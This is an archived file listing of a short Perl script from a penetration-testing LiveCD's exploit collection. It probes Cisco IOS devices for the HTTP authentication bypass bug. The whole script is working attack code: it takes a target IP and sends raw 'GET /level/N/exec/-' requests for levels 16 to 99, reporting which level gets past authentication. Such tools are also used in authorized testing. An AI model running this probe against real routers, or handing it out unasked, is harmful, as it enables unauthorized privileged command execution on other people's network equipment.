home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / cishttpex.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  1KB  |  36 lines

---

1. #!/usr/bin/perl
2. # modified roelof's uni.pl
3. # to check cisco ios http auth bug
4. # cronos <cronos@olympos.org>
5. use Socket;
6. print "enter IP (x.x.x.x): ";
7. $host= <STDIN>;
8. chop($host);
9. $i=16;
10. $port=80;
11. $target = inet_aton($host);
12. $flag=0;
13. LINE: while ($i<100) { 
14. # ------------- Sendraw - thanx RFP rfp@wiretrip.net
15. my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
16. foreach $line (@results){
17.         $line=~ tr/A-Z/a-z/;
18.         if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
19.         if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
20. } 
21.         if ($flag==1){print "Not Vulnerable with $i\n\r";}
22.                 else {print "$line Vulnerable with $i\n\r"; last LINE; }
23.         $i++;
24. sub sendraw {
25.         my ($pstr)=@_;
26.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
27.                 die("Socket problems\n");
28.         if(connect(S,pack "SnA4x8",2,$port,$target)){
29.                 my @in;
30.                 select(S);      $|=1;   print $pstr;
31.                 while(<S>){ push @in, $_;}
32.                 select(STDOUT); close(S); return @in;
33.         } else { die("Can't connect...\n"); }
34. }
35. }
36.